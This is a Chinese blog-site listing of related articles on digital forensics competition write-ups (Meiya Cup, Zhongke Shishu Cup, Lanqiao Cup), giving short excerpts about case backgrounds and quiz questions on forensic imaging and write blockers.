    科学的运用提取和证明方法,对从电子数据源提取的证据进行保护、收集、验证、鉴定、分析、解释、存档和出示,以有助于进一步的犯罪事件重构或帮助识别某些计划操作无关的非授权性活动。 在网络安全大环境中,信息安全可以看作是解决事前防御问题,电子取证则是解

    2024年02月13日
    浏览(53)
  • 第二届“中科实数杯”全国电子数据取证 wp

    准备参加第三届的比赛了,特意把第二届的比赛写一下,第一次写wp,不足之处请多多指点 第二部分------案件背景介绍 🌎王刚(英文名kugoo)是一家国内大型电子商务公司的服务器管理员,他负责公司多台服务器的日常运维管理。 王刚利用个人职位之便,私下将客户的资料

    2024年02月09日
    浏览(99)
  • 2018年美亚杯电子数据取证大赛-资格赛wp

    😋 大家好,我是YAy_17,是一枚爱好网安的小白,正在自学ing。   本人水平有限,欢迎各位大佬指点,一起学习 💗 ,一起进步 ⭐️ 。 ⭐️ 此后如竟没有炬火,我便是唯一的光。 ⭐️ 使用取证大师分析镜像: 1. [单选题] 1.Victor的笔记本电脑己成功取证并制作成法证映像档

    2024年02月01日
    浏览(52)
  • 2020年第十一届蓝桥杯省赛+解析(门牌制作、寻找2020、跑步锻炼、蛇形填数、排序、成绩统计、单词分析)

    目录 门牌制作 寻找2020 跑步锻炼 蛇形填数 排序 成绩统计

    2023年04月08日
    浏览(55)
  • 2022“美亚杯”第八届中国电子数据取证大赛-团队赛题目

    2022“美亚杯”第八届中国电子数据取证大赛-团队赛题目 更多网络安全CTF题目,欢迎来polarctf.com来刷题 本人wechat N34939 检材文件下载链接:https://pan.baidu.com/s/1kg8FMeMaj6BIBmuvUZHA3Q?pwd=ngzs 提取码:ngzs 个人赛与团队赛下载文件解压密码:MeiyaCup2022 个人赛解压缩时间: 45min左右 团队

    2024年02月03日
    浏览(59)
  • “美亚杯”第三届中国电子数据取证大赛答案解析(团体赛)

    Gary 被逮捕后,其计算机被没收并送至计算机取证实验室。经调查后,执法机关再逮捕一名疑犯Eric,并检取其家中计算机(window 8), 并而根据其家中计算机纪录, 执法机关再于其他地方取得一台与案有关的服务器,而该服务器内含四个硬盘。该服务器是运行LINUX 系统。 由于事件涉

    2024年02月12日
    浏览(70)
  • “美亚杯”第二届中国电子数据取证大赛答案解析(团体赛)

    1. 根据所提供的文件,在映像文件的采集过程中,曾使用那一种的写入保护设备? A)软件写入保护设备 B)WiebeTech写入保护设备 C)EPOS写入保护器 D)Tableau取证工具SATA / IDE Bridge IEEE 1394 SBP2Device E)ICS drive lock 取证过程中,镜像文件需要与源文件保持完全一致,所以写入设备

    2024年02月16日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包